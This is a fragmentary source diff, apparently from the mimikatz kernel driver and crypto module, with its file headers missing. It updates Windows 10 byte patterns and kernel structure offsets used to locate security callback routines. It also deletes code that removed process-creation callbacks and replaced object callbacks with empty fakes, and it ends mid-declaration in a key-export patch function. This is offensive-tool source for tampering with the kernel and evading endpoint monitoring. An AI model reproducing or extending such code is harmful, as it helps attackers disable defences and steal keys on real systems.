{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Process), PTRN_WXP_Process}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"RtlValidSid", L"NtOpenThreadTokenEx", { -4, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Process), PTRN_WI7_Process}, L"RtlCompareUnicodeStrings", L"ObQueryNameString", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Process), PTRN_WI8_Process}, L"PsAssignImpersonationToken", L"NtFindAtom", { 19, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"RtlGetIntegerAtom", L"PsGetThreadSessionId", { -4, 64}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Process), PTRN_W10_Process}, L"PoRegisterCoalescingCallback", L"RtlInitCodePageTable", { -4, 64}},
|
||||
UCHAR PTRN_W10_1507_Process[] = {0x8b, 0xf7, 0x57, 0x8b, 0xd0, 0x8b, 0xcb, 0xe8};
|
||||
UCHAR PTRN_W10_1511_Process[] = {0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd0, 0x8b, 0xcf, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ProcessReferences[] = { // PspCreateProcessNotifyRoutine
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Process), PTRN_WXP_Process}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"RtlValidSid", L"NtOpenThreadTokenEx", { -4, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Process), PTRN_WI7_Process}, L"RtlCompareUnicodeStrings", L"ObQueryNameString", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Process), PTRN_WI8_Process}, L"PsAssignImpersonationToken", L"NtFindAtom", { 19, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"RtlGetIntegerAtom", L"PsGetThreadSessionId", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Process), PTRN_W10_1507_Process}, L"PoRegisterCoalescingCallback", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process}, L"PoRegisterCoalescingCallback", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Image[] = {0x53, 0x56, 0x57, 0x6a, 0x08, 0xbf};
|
||||
UCHAR PTRN_W23_Image[] = {0x53, 0x56, 0x57, 0x6a, 0x08, 0xbf};
|
||||
@ -128,15 +136,17 @@ UCHAR PTRN_WVI_Image[] = {0xc7, 0x45, 0xfc, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75,
|
||||
UCHAR PTRN_WI7_Image[] = {0xc7, 0x45, 0xfc, 0x40, 0x00, 0x00, 0x00, 0xff, 0x75, 0x10, 0xe8};
|
||||
UCHAR PTRN_WI8_Image[] = {0xbb, 0x08, 0x00, 0x00, 0x00, 0x8b, 0xff, 0xe8};
|
||||
UCHAR PTRN_W81_Image[] = {0x33, 0xff, 0x6a, 0x00, 0x8b, 0xd6, 0x8b, 0xcb, 0xe8};
|
||||
UCHAR PTRN_W10_Image[] = {0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd3, 0x8b, 0xcf, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ImageReferences[] = {
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Image), PTRN_WXP_Image}, L"PsRemoveLoadImageNotifyRoutine", L"PsCreateSystemProcess", { 6, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Image), PTRN_W23_Image}, L"PsRemoveLoadImageNotifyRoutine", L"PsCreateSystemThread", { 6, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Image), PTRN_WVI_Image}, L"RtlUpcaseUnicodeStringToCountedOemString",L"IoCheckShareAccessEx", { -4, 8}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Image), PTRN_WI7_Image}, L"RtlCopySidAndAttributesArray", L"SeImpersonateClientEx", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Image), PTRN_WI8_Image}, L"PsAssignImpersonationToken", L"NtFindAtom", { -4, 8}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Image), PTRN_W81_Image}, L"PsSetLoadImageNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
||||
UCHAR PTRN_W10_1507_Image[] = {0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd3, 0x8b, 0xcf, 0xe8};
|
||||
UCHAR PTRN_W10_1511_Image[] = {0x33, 0xf6, 0x53, 0x89, 0x45, 0xfc, 0x8b, 0xde, 0x56, 0x8b, 0xd7, 0x8b, 0xc8, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ImageReferences[] = { // PspLoadImageNotifyRoutine
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Image), PTRN_WXP_Image}, L"PsRemoveLoadImageNotifyRoutine", L"PsCreateSystemProcess", { 6, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Image), PTRN_W23_Image}, L"PsRemoveLoadImageNotifyRoutine", L"PsCreateSystemThread", { 6, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Image), PTRN_WVI_Image}, L"RtlUpcaseUnicodeStringToCountedOemString",L"IoCheckShareAccessEx", { -4, 8}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Image), PTRN_WI7_Image}, L"RtlCopySidAndAttributesArray", L"SeImpersonateClientEx", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Image), PTRN_WI8_Image}, L"PsAssignImpersonationToken", L"NtFindAtom", { -4, 8}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Image), PTRN_W81_Image}, L"PsSetLoadImageNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Image), PTRN_W10_1507_Image}, L"PsSetLoadImageNotifyRoutine", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Image), PTRN_W10_1511_Image}, L"PsSetLoadImageNotifyRoutine", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Object[] = {0x3b, 0xfb, 0xc6, 0x45, 0xe6, 0x00, 0x89, 0x5d, 0xe0, 0x89, 0x5d, 0xdc, 0xc7, 0x45, 0xe8};
|
||||
UCHAR PTRN_W23_Object[] = {0x3b, 0xfb, 0xc6, 0x45, 0xe6, 0x00, 0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xd8, 0xc7, 0x45, 0xe8};
|
||||
@ -144,15 +154,16 @@ UCHAR PTRN_WVI_Object[] = {0x3b, 0xc3, 0x88, 0x5c, 0x24, 0x3a, 0x89, 0x5c, 0x24,
|
||||
UCHAR PTRN_WI7_Object[] = {0xc6, 0x44, 0x24, 0x22, 0x00, 0xc6, 0x44, 0x24, 0x23, 0x00, 0x89, 0x74, 0x24, 0x18, 0x89, 0x74, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x24};
|
||||
UCHAR PTRN_WI8_Object[] = {0x33, 0xc0, 0x8b, 0xf8, 0x66, 0x89, 0x44, 0x24, 0x2a, 0x89, 0x44, 0x24, 0x1c, 0x89, 0x7c, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x2c};
|
||||
UCHAR PTRN_W81_Object[] = {0x8d, 0x44, 0x24, 0x14, 0x50, 0x33, 0xc0, 0x89, 0x7c, 0x24, 0x18, 0x50, 0x6a, 0x40};
|
||||
UCHAR PTRN_W10_Object[] = {0x33, 0xd2, 0x66, 0x89, 0x54, 0x24, 0x26, 0x8b, 0xfa, 0x89, 0x54, 0x24, 0x18, 0x89, 0x7c, 0x24, 0x14};
|
||||
KKLL_M_MEMORY_GENERIC ObjectReferences[] = {
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Object), PTRN_WXP_Object}, L"ObCreateObjectType", L"NtOpenThread", { -4, 0x040, 0x08c}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Object), PTRN_W23_Object}, L"ObCreateObjectType", L"NtOpenThread", { -4, 0x040, 0x08c}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Object), PTRN_WVI_Object}, L"ObCreateObjectType", L"RtlInvertRangeList", { -4, 0x008, 0x058, 0x138}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Object), PTRN_WI7_Object}, L"ObCreateObjectType", L"RtlInvertRangeList", { -4, 0x008, 0x058, 0x080}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Object), PTRN_WI8_Object}, L"ObCreateObjectType", L"SeTokenIsAdmin", { -4, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Object), PTRN_W81_Object}, L"ObCreateObjectType", L"KseRegisterShim", { -4, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { -4, 0x008, 0x058, 0x088}},
|
||||
UCHAR PTRN_W10_Object[] = {0x66, 0x8b, 0x02, 0x49, 0x8d, 0x52, 0x02, 0x66, 0x83, 0xf8, 0x5c, 0x0f, 0x84};
|
||||
KKLL_M_MEMORY_GENERIC ObjectReferences[] = { // ObpTypeDirectoryObject
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Object), PTRN_WXP_Object}, L"ObCreateObjectType", L"NtOpenThread", { -4, 0x040, 0x08c}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Object), PTRN_W23_Object}, L"ObCreateObjectType", L"NtOpenThread", { -4, 0x040, 0x08c}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Object), PTRN_WVI_Object}, L"ObCreateObjectType", L"RtlInvertRangeList", { -4, 0x008, 0x058, 0x138}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Object), PTRN_WI7_Object}, L"ObCreateObjectType", L"RtlInvertRangeList", { -4, 0x008, 0x058, 0x080}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Object), PTRN_WI8_Object}, L"ObCreateObjectType", L"SeTokenIsAdmin", { -4, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Object), PTRN_W81_Object}, L"ObCreateObjectType", L"KseRegisterShim", { -4, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 23, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 23, 0x008, 0x058, 0x088}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Reg[] = {0x89, 0x7d, 0x10, 0x57, 0xff, 0x75, 0xfc, 0xff, 0x75, 0x08, 0xe8};
|
||||
UCHAR PTRN_W23_Reg[] = {0x89, 0x5d, 0x08, 0x53, 0xff, 0x75, 0xfc, 0x57, 0xe8};
|
||||
@ -160,15 +171,16 @@ UCHAR PTRN_WVI_Reg[] = {0x8b, 0x03, 0x8b, 0x4b, 0x04, 0x3b, 0x46, 0x10, 0x75};
|
||||
UCHAR PTRN_WI7_Reg[] = {0x8b, 0x03, 0x8b, 0x4b, 0x04, 0x3b, 0x46, 0x10, 0x75};
|
||||
UCHAR PTRN_WI8_Reg[] = {0x53, 0x8d, 0x55, 0xd0, 0x8b, 0xce, 0xe8};
|
||||
UCHAR PTRN_W81_Reg[] = {0x8b, 0x08, 0x8b, 0x40, 0x04, 0x3b, 0x4e, 0x10, 0x75};
|
||||
UCHAR PTRN_W10_Reg[] = {0x8b, 0x4d, 0x0c, 0x8b, 0x01, 0x8b, 0x49, 0x04, 0x3b, 0x46, 0x10, 0x75};
|
||||
KKLL_M_MEMORY_GENERIC RegReferences[] = {
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Reg), PTRN_WXP_Reg}, L"CmRegisterCallback", L"FsRtlMdlReadDev", { -4}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Reg), PTRN_W23_Reg}, L"CmRegisterCallback", L"FsRtlCopyRead", { -4}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Reg), PTRN_WVI_Reg}, L"CmSetCallbackObjectContext", L"EmClientRuleRegisterNotification",{ -8, 0x01c}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Reg), PTRN_WI7_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Reg), PTRN_WI8_Reg}, L"CmUnRegisterCallback", L"FsRtlIsFatDbcsLegal", { -4, 0x01c}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Reg), PTRN_W81_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmSetCallbackObjectContext", L"CmUnRegisterCallback", { -8, 0x01c}},
|
||||
UCHAR PTRN_W10_Reg[] = {0x8b, 0x4d, 0x0c, 0x8b, 0x01, 0x8b, 0x49, 0x04, 0x3b};
|
||||
KKLL_M_MEMORY_GENERIC RegReferences[] = { // CallbackListHead
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Reg), PTRN_WXP_Reg}, L"CmRegisterCallback", L"FsRtlMdlReadDev", { -4}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Reg), PTRN_W23_Reg}, L"CmRegisterCallback", L"FsRtlCopyRead", { -4}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Reg), PTRN_WVI_Reg}, L"CmSetCallbackObjectContext", L"EmClientRuleRegisterNotification",{ -8, 0x01c}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Reg), PTRN_WI7_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Reg), PTRN_WI8_Reg}, L"CmUnRegisterCallback", L"FsRtlIsFatDbcsLegal", { -4, 0x01c}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Reg), PTRN_W81_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmSetCallbackObjectContext", L"CmUnRegisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmSetCallbackObjectContext", L"CmUnRegisterCallback", { -8, 0x01c}},
|
||||
};
|
||||
#endif
|
||||
|
||||
@ -349,102 +361,4 @@ NTSTATUS kkll_m_notify_desc_object_callback(POBJECT_CALLBACK_ENTRY pCallbackEntr
|
||||
}
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
|
||||
UNICODE_STRING uPsSetCreateProcessNotifyRoutineEx = {66, 68, L"PsSetCreateProcessNotifyRoutineEx"};
|
||||
NTSTATUS kkll_m_notify_init()
|
||||
{
|
||||
SIZE_T codeSize;
|
||||
NTSTATUS status = STATUS_NOT_FOUND;
|
||||
if(pPsSetCreateProcessNotifyRoutineEx = (PPSSETCREATEPROCESSNOTIFYROUTINEEX) MmGetSystemRoutineAddress(&uPsSetCreateProcessNotifyRoutineEx))
|
||||
|
||||
codeSize = (ULONG_PTR) kkll_m_notify_fake_ObjectPreCallback_end - (ULONG_PTR) kkll_m_notify_fake_ObjectPreCallback;
|
||||
if(kkll_m_notify_fakePre = (POB_PRE_OPERATION_CALLBACK) ExAllocatePoolWithTag(NonPagedPool, codeSize, POOL_TAG))
|
||||
RtlCopyMemory(kkll_m_notify_fakePre, kkll_m_notify_fake_ObjectPreCallback, codeSize);
|
||||
|
||||
codeSize = (ULONG_PTR) kkll_m_notify_fake_ObjectPostCallback_end - (ULONG_PTR) kkll_m_notify_fake_ObjectPostCallback;
|
||||
if(kkll_m_notify_fakePost = (POB_POST_OPERATION_CALLBACK) ExAllocatePoolWithTag(NonPagedPool, codeSize, POOL_TAG))
|
||||
RtlCopyMemory(kkll_m_notify_fakePost, kkll_m_notify_fake_ObjectPostCallback, codeSize);
|
||||
|
||||
|
||||
if(pPsSetCreateProcessNotifyRoutineEx && kkll_m_notify_fakePre && kkll_m_notify_fakePost)
|
||||
status = STATUS_SUCCESS;
|
||||
else
|
||||
{
|
||||
if(kkll_m_notify_fakePre)
|
||||
{
|
||||
ExFreePoolWithTag(kkll_m_notify_fakePre, POOL_TAG);
|
||||
kkll_m_notify_fakePre = NULL;
|
||||
}
|
||||
if(kkll_m_notify_fakePost)
|
||||
{
|
||||
ExFreePoolWithTag(kkll_m_notify_fakePost, POOL_TAG);
|
||||
kkll_m_notify_fakePost = NULL;
|
||||
}
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
NTSTATUS kkll_m_notify_remove_process(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)
|
||||
{
|
||||
NTSTATUS status = STATUS_INVALID_HANDLE;
|
||||
UNICODE_STRING uString;
|
||||
|
||||
if(bufferIn && (szBufferIn == sizeof(PCREATE_PROCESS_NOTIFY_ROUTINE)))
|
||||
{
|
||||
status = PsSetCreateProcessNotifyRoutine(*(PCREATE_PROCESS_NOTIFY_ROUTINE *) bufferIn, TRUE);
|
||||
if(!NT_SUCCESS(status) && pPsSetCreateProcessNotifyRoutineEx)
|
||||
status = pPsSetCreateProcessNotifyRoutineEx(*(PCREATE_PROCESS_NOTIFY_ROUTINE_EX *) bufferIn, TRUE);
|
||||
|
||||
if(NT_SUCCESS(status))
|
||||
{
|
||||
status = kprintf(outBuffer, L"Removed : ");
|
||||
if(NT_SUCCESS(status))
|
||||
status = kkll_m_modules_fromAddr(outBuffer, *(PVOID *) bufferIn);
|
||||
}
|
||||
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
|
||||
NTSTATUS kkll_m_notify_remove_object(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)
|
||||
{
|
||||
NTSTATUS status = STATUS_INVALID_HANDLE;
|
||||
POBJECT_CALLBACK_ENTRY pCallbackEntry;
|
||||
|
||||
if(bufferIn && (szBufferIn == sizeof(POBJECT_CALLBACK_ENTRY)))
|
||||
{
|
||||
if(pCallbackEntry = *(POBJECT_CALLBACK_ENTRY *) bufferIn)
|
||||
{
|
||||
status = kkll_m_notify_desc_object_callback(pCallbackEntry, outBuffer);
|
||||
if(NT_SUCCESS(status))
|
||||
{
|
||||
if(pCallbackEntry->PreOperation && kkll_m_notify_fakePre)
|
||||
pCallbackEntry->PreOperation = kkll_m_notify_fakePre;
|
||||
if(pCallbackEntry->PostOperation && kkll_m_notify_fakePost)
|
||||
pCallbackEntry->PostOperation = kkll_m_notify_fakePost;
|
||||
|
||||
status = kkll_m_notify_desc_object_callback(pCallbackEntry, outBuffer);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
#pragma optimize("", off)
|
||||
OB_PREOP_CALLBACK_STATUS kkll_m_notify_fake_ObjectPreCallback(IN PVOID RegistrationContext, IN POB_PRE_OPERATION_INFORMATION OperationInformation)
|
||||
{
|
||||
return OB_PREOP_SUCCESS;
|
||||
}
|
||||
DWORD kkll_m_notify_fake_ObjectPreCallback_end(){return 'kpre';}
|
||||
|
||||
|
||||
VOID kkll_m_notify_fake_ObjectPostCallback(IN PVOID RegistrationContext, IN POB_POST_OPERATION_INFORMATION OperationInformation)
|
||||
{
|
||||
}
|
||||
DWORD kkll_m_notify_fake_ObjectPostCallback_end(){return 'kpos';}
|
||||
#pragma optimize("", on)
|
||||
}
|
||||
@ -42,21 +42,12 @@ typedef struct _OBJECT_CALLBACK_ENTRY {
|
||||
typedef NTSTATUS (* PPSSETCREATEPROCESSNOTIFYROUTINEEX) ( __in PCREATE_PROCESS_NOTIFY_ROUTINE_EX NotifyRoutine, __in BOOLEAN Remove);
|
||||
//typedef VOID (* POBUNREGISTERCALLBACKS) (__in PVOID RegistrationHandle);
|
||||
|
||||
NTSTATUS kkll_m_notify_init();
|
||||
NTSTATUS kkll_m_notify_list_thread(PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_list_process(PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_list_image(PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_list_reg(PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_list_object(PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_desc_object_callback(POBJECT_CALLBACK_ENTRY pCallbackEntry, PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_remove_process(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer);
|
||||
NTSTATUS kkll_m_notify_remove_object(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer);
|
||||
|
||||
NTSTATUS kkll_m_notify_list(PKIWI_BUFFER outBuffer, PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax);
|
||||
NTSTATUS kkll_m_notify_search(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax, PKKLL_M_MEMORY_OFFSETS * pOffsets);
|
||||
|
||||
|
||||
OB_PREOP_CALLBACK_STATUS kkll_m_notify_fake_ObjectPreCallback(IN PVOID RegistrationContext, IN POB_PRE_OPERATION_INFORMATION OperationInformation);
|
||||
DWORD kkll_m_notify_fake_ObjectPreCallback_end();
|
||||
VOID kkll_m_notify_fake_ObjectPostCallback(IN PVOID RegistrationContext, IN POB_POST_OPERATION_INFORMATION OperationInformation);
|
||||
DWORD kkll_m_notify_fake_ObjectPostCallback_end();
|
||||
NTSTATUS kkll_m_notify_search(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax, PKKLL_M_MEMORY_OFFSETS * pOffsets);
|
||||
@ -15,7 +15,8 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
|
||||
/* 7 */ {0x00b8, 0x026c, 0x0040},
|
||||
/* 8 */ {0x00b8, 0x00c0, 0x0040, 0x02d4},
|
||||
/* BLUE */ {0x00b8, 0x00c0, 0x0040, 0x02cc},
|
||||
/* 10 */ {0x00b8, 0x00c0, 0x0040, 0x02d4},
|
||||
/* 10_1507*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
|
||||
/* 10_1511*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
|
||||
#else
|
||||
/* UNK */ {0},
|
||||
/* XP */ {0},
|
||||
@ -24,7 +25,8 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
|
||||
/* 7 */ {0x0188, 0x043c, 0x0040},
|
||||
/* 8 */ {0x02e8, 0x02f8, 0x0040, 0x0648},
|
||||
/* BLUE */ {0x02e8, 0x02f8, 0x0040, 0x0678},
|
||||
/* 10 */ {0x02f0, 0x0300, 0x0040, 0x0698},//0x06a9},//0x0698},
|
||||
/* 10_1507*/{0x02f0, 0x0300, 0x0040, 0x06a8},
|
||||
/* 10_1511*/{0x02f0, 0x0300, 0x0040, 0x06b0},
|
||||
#endif
|
||||
};
|
||||
|
||||
@ -34,8 +36,8 @@ NTSTATUS kkll_m_process_enum(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER out
|
||||
PEPROCESS pProcess = NULL;
|
||||
for(
|
||||
pProcess = PsInitialSystemProcess;
|
||||
NT_SUCCESS(status) && (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext]))- EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext]) != PsInitialSystemProcess;
|
||||
pProcess = (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext]))- EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])
|
||||
NT_SUCCESS(status) && (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])) - EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext]) != PsInitialSystemProcess;
|
||||
pProcess = (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])) - EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])
|
||||
)
|
||||
{
|
||||
status = callback(szBufferIn, bufferIn, outBuffer, pProcess, pvArg);
|
||||
|
||||
@ -39,9 +39,6 @@ NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRe
|
||||
pDeviceObject->Flags &= ~DO_DEVICE_INITIALIZING;
|
||||
IoCreateSymbolicLink(&uStrDosDeviceName, &uStrDriverName);
|
||||
status = AuxKlibInitialize();
|
||||
|
||||
if(KiwiOsIndex >= KiwiOsIndex_VISTA)
|
||||
status = kkll_m_notify_init();
|
||||
}
|
||||
}
|
||||
return status;
|
||||
@ -133,12 +130,6 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR
|
||||
case IOCTL_MIMIDRV_NOTIFY_OBJECT_LIST:
|
||||
status = kkll_m_notify_list_object(&kOutputBuffer);
|
||||
break;
|
||||
case IOCTL_MIMIDRV_NOTIFY_PROCESS_REMOVE:
|
||||
status = kkll_m_notify_remove_process(szBufferIn, bufferIn, &kOutputBuffer);
|
||||
break;
|
||||
case IOCTL_MIMIDRV_NOTIFY_OBJECT_REMOVE:
|
||||
status = kkll_m_notify_remove_object(szBufferIn, bufferIn, &kOutputBuffer);
|
||||
break;
|
||||
|
||||
case IOCTL_MIMIDRV_FILTER_LIST:
|
||||
status = kkll_m_filters_list(&kOutputBuffer);
|
||||
@ -176,8 +167,8 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR
|
||||
|
||||
KIWI_OS_INDEX getWindowsIndex()
|
||||
{
|
||||
if(*NtBuildNumber > 9800) // forever blue =)
|
||||
return KiwiOsIndex_10;
|
||||
if(*NtBuildNumber > 10586) // forever 10 =)
|
||||
return KiwiOsIndex_10_1511;
|
||||
|
||||
switch(*NtBuildNumber)
|
||||
{
|
||||
@ -204,10 +195,11 @@ KIWI_OS_INDEX getWindowsIndex()
|
||||
case 9600:
|
||||
return KiwiOsIndex_BLUE;
|
||||
break;
|
||||
case 9800:
|
||||
case 9841:
|
||||
case 9926:
|
||||
return KiwiOsIndex_10;
|
||||
case 10240:
|
||||
return KiwiOsIndex_10_1507;
|
||||
break;
|
||||
case 10586:
|
||||
return KiwiOsIndex_10_1511;
|
||||
break;
|
||||
default:
|
||||
return KiwiOsIndex_UNK;
|
||||
|
||||
@ -911,13 +911,12 @@ KULL_M_PATCH_GENERIC Capi4000References[] = {
|
||||
#endif
|
||||
NTSTATUS kuhl_m_crypto_p_capi(int argc, wchar_t * argv[])
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModuleRsaEnh;
|
||||
KULL_M_MEMORY_ADDRESS
|
||||
aPattern4000Memory = {NULL, &hLocalMemory},
|
||||
aPattern4001Memory = {NULL, &hLocalMemory},
|
||||
aPatchMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{K_CPExportKey, &hLocalMemory}, 0}, NULL};
|
||||
aPattern4000Memory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE},
|
||||
aPattern4001Memory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE},
|
||||
